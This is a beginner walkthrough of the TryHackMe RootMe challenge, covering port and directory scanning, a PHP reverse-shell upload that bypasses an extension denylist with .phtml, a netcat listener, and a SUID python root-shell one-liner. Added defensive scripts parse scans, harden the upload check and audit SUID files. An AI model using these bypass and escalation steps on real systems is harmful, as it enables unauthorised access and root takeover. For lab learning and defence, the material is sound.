Understanding CTF TryHackMe - RootMe

This guide walks you through a Capture The Flag (CTF) challenge designed for beginners. The goal is to gain root access to a system by following a series of steps involving reconnaissance, exploitation, and privilege escalation.

Key Points

  • Reconnaissance: Identify open ports and services.
  • Directory Enumeration: Use tools like gobuster to find hidden directories.
  • Exploitation: Upload a reverse shell to gain initial access.
  • Privilege Escalation: Identify and exploit SUID permissions to gain root access.

Reconnaissance

Start by scanning the target IP to identify open ports and services.

nmap -sV xx.xx.xxx.xx

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-15 09:41 GMT
Nmap scan report for 10.10.132.77
Host is up (0.00035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:18:D9:B2:7B:19 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

Key Findings:

Open Ports   Service   Version
22/tcp       ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp       http      Apache httpd 2.4.29
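The Key Findings table above is what you get by reading the nmap output by hand. The following script, added to this guide and not part of the original walkthrough, parses `nmap -sV` normal output into structured records and rebuilds that table, then flags any open service that is not on an expected baseline (the baseline set `{"ssh"}` is an assumption for the example). The embedded scan text is a copy of the output shown above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Sample input: the nmap -sV output reproduced from the walkthrough above.
NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-15 09:41 GMT
Nmap scan report for 10.10.132.77
Host is up (0.00035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:18:D9:B2:7B:19 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
"""


@dataclass
class OpenPort:
    host: str
    port: int
    proto: str
    service: str
    version: str


# "22/tcp open  ssh     OpenSSH 7.6p1 ..." -> port, proto, state, service, rest of line
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text: str) -> List[OpenPort]:
    """Return one OpenPort per 'open' port line in nmap's normal output."""
    host = ""
    ports: List[OpenPort] = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)          # later port lines belong to this host
            continue
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append(OpenPort(host, int(m.group(1)), m.group(2),
                                  m.group(4), m.group(5).strip()))
    return ports


def findings_table(ports: Iterable[OpenPort]) -> str:
    """Render the same plain-text table the walkthrough shows under Key Findings."""
    rows = [f"{'Open Ports':<12} {'Service':<9} Version"]
    for p in ports:
        rows.append(f"{f'{p.port}/{p.proto}':<12} {p.service:<9} {p.version}")
    return "\n".join(rows)


def unexpected_services(ports: Iterable[OpenPort], expected: Set[str]) -> List[OpenPort]:
    """Defender's view: anything listening that is not on the expected baseline
    (assumed baseline for the example; on a real host build it from the host's role)."""
    return [p for p in ports if p.service not in expected]


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    print(findings_table(found))
    for p in unexpected_services(found, {"ssh"}):
        print(f"unexpected: {p.host}:{p.port}/{p.proto} {p.service} ({p.version})")
```

For a larger scan, feed `nmap -oN` output to `parse_nmap` the same way; `-oX` with an XML parser is the more robust choice when the output will be consumed by tooling rather than read.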

Directory Enumeration

Use gobuster to find hidden directories.

gobuster dir -u xx.xx.xxx.xx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Output:

Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.132.77/uploads/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.132.77/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.132.77/js/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.132.77/panel/]
/server-status        (Status: 403) [Size: 277]

Hidden Directory: /panel/

Getting a Shell

Navigate to http://xx.xx.xxx.xx/panel/ and upload a PHP reverse shell.

  1. Set up a listener on your attack box:

nc -lvnp 4321

  2. Upload the reverse shell:

    • The .php extension is blocked. Use .phtml instead.

  3. Reverse Shell Output:

Listening on 0.0.0.0 4321
Connection received on 10.10.132.77 36610
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:52:37 up 15 min,  0 users,  load average: 0.00, 0.19, 0.30
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

  4. Find the user flag:

find / -name "user.txt"

Output:

/var/www/user.txt

Flag:

cat /var/www/user.txt
THM{xxx}
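The upload panel fails because it rejects one extension by name, while Debian and Ubuntu ship Apache's PHP module with a FilesMatch rule that also hands `.phtml` and `.phar` files to the interpreter. The script below is an added example written for this guide (it is not the panel's code, whose source the walkthrough does not show): it puts the weak denylist check beside an allowlist check, and adds a small detection that scans Apache access-log lines for script files being served out of `/uploads/`. The allowed image extensions and the log lines are constructed for the example.

```python
import os
import re
from typing import Iterable, List

# Extensions the stock Debian/Ubuntu Apache PHP configuration routes to PHP.
PHP_HANDLER_EXTENSIONS = {".php", ".phtml", ".phar"}

# Assumed for the example: the panel is meant to accept images only.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def denylist_check(filename: str) -> bool:
    """The weak check, matching the panel's behaviour above:
    accept anything that does not end in a literal '.php'."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened check: drop any client-supplied directory part, require
    exactly one extension, and require it to be on the known-good list.
    Double extensions such as name.phtml.png are rejected outright."""
    base = os.path.basename(filename.replace("\\", "/"))
    segments = base.lower().split(".")
    if len(segments) != 2 or not all(segments):
        return False                      # no extension, double extension, or empty part
    return "." + segments[1] in ALLOWED_EXTENSIONS


# Apache combined log: ... "GET /path HTTP/1.1" 200 ...
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_upload_requests(log_lines: Iterable[str]) -> List[str]:
    """Detection: successfully served requests for PHP-handled files under /uploads/.
    A web root that only stores user uploads there should never serve such a file."""
    hits: List[str] = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        path, status = m.group(1), m.group(2)
        ext = os.path.splitext(path.split("?", 1)[0])[1].lower()
        if path.startswith("/uploads/") and ext in PHP_HANDLER_EXTENSIONS and status.startswith("2"):
            hits.append(path)
    return hits


# Constructed sample log lines (not taken from the box), Apache combined format.
SAMPLE_LOG = [
    '10.10.14.5 - - [15/Mar/2025:09:51:58 +0000] "POST /panel/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [15/Mar/2025:09:52:30 +0000] "GET /uploads/shell.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [15/Mar/2025:09:52:31 +0000] "GET /uploads/photo.png HTTP/1.1" 200 8831 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [15/Mar/2025:09:52:40 +0000] "GET /server-status HTTP/1.1" 403 277 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for name in ("photo.png", "shell.php", "shell.phtml", "shell.phtml.png"):
        print(f"{name:16} denylist={denylist_check(name)!s:5} allowlist={allowlist_check(name)}")
    print("served scripts under /uploads/:", suspicious_upload_requests(SAMPLE_LOG))
```

Extension checks are only one layer: the upload directory should also be served with PHP execution disabled (for example a `php_admin_flag engine off` or `RemoveHandler` in that directory's Apache configuration) and stored files should get a server-generated name, so a bypass of the name check alone gains nothing.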

Privilege Escalation

Identify files with SUID permissions to escalate privileges.

find / -user root -perm /4000

SUID, short for Set User ID, is a permission bit that can be set on executable files. When it is set, a process started from that file runs with the effective user ID of the file's owner rather than that of the user who launched it. On a root-owned interpreter such as python this means any code passed to it runs as root.

Unusual SUID file: /usr/bin/python

Escalation Command (run from /usr/bin; the -p flag tells sh to keep the elevated effective UID instead of dropping it):

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
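The find command above is exactly the check a defender should run on a schedule and diff against a known-good baseline. The following audit script is an added example for this guide, not part of the original walkthrough: it reproduces the `-user root -perm /4000` test from a file's mode and owner, compares the result against a baseline of binaries that legitimately carry the bit, and reports the rest. The baseline set and the sample entries are constructed for the example (the sample includes /usr/bin/python with mode 4755 to mirror this box).

```python
import os
import stat
from typing import Iterable, Iterator, List, Set, Tuple

# Assumed baseline: root-owned setuid binaries that are normal on a stock
# Ubuntu 18.04 host. On a real fleet, generate it from a clean reference image.
SUID_BASELINE: Set[str] = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping",
}

Entry = Tuple[str, int, int]   # (path, st_mode, st_uid)


def is_root_suid(mode: int, uid: int) -> bool:
    """Same predicate as `find / -user root -perm /4000`: owned by uid 0
    and the setuid bit (0o4000) set in the mode."""
    return uid == 0 and bool(mode & stat.S_ISUID)


def audit_suid(entries: Iterable[Entry], baseline: Set[str] = SUID_BASELINE) -> List[str]:
    """Return root-owned setuid files that are not on the baseline, sorted."""
    return sorted(path for path, mode, uid in entries
                  if is_root_suid(mode, uid) and path not in baseline)


def walk_filesystem(root: str = "/") -> Iterator[Entry]:
    """Yield (path, mode, uid) for every regular file under root; lstat so
    symlinks are reported as themselves rather than followed."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                     # unreadable or vanished; skip
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid


# Constructed sample entries; 0o104755 is a regular file with mode 4755.
SAMPLE_ENTRIES: List[Entry] = [
    ("/usr/bin/passwd", 0o104755, 0),     # on the baseline
    ("/usr/bin/sudo", 0o104755, 0),       # on the baseline
    ("/usr/bin/python", 0o104755, 0),     # the unusual file from this box
    ("/usr/bin/ls", 0o100755, 0),         # root-owned, no setuid bit
    ("/home/user/tool", 0o104755, 1000),  # setuid, but not root-owned
]


if __name__ == "__main__":
    print("unexpected root setuid files (sample):", audit_suid(SAMPLE_ENTRIES))
    # Live run over the real filesystem (slow; run as a privileged user for full coverage):
    # print(audit_suid(walk_filesystem("/")))
```

When the audit reports an interpreter or any other binary that does not need the bit, the fix is to clear it (`chmod u-s /usr/bin/python`) and, where possible, to mount user-writable filesystems with `nosuid` so a setuid file dropped there is not honoured.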

Find the root flag:

find / -name "root.txt"

Output:

cat /root/root.txt

Flag:

THM{xxx}

Learn More

To further your understanding of CTF challenges and cybersecurity, consider exploring additional resources and practicing on platforms like TryHackMe and Hack The Box.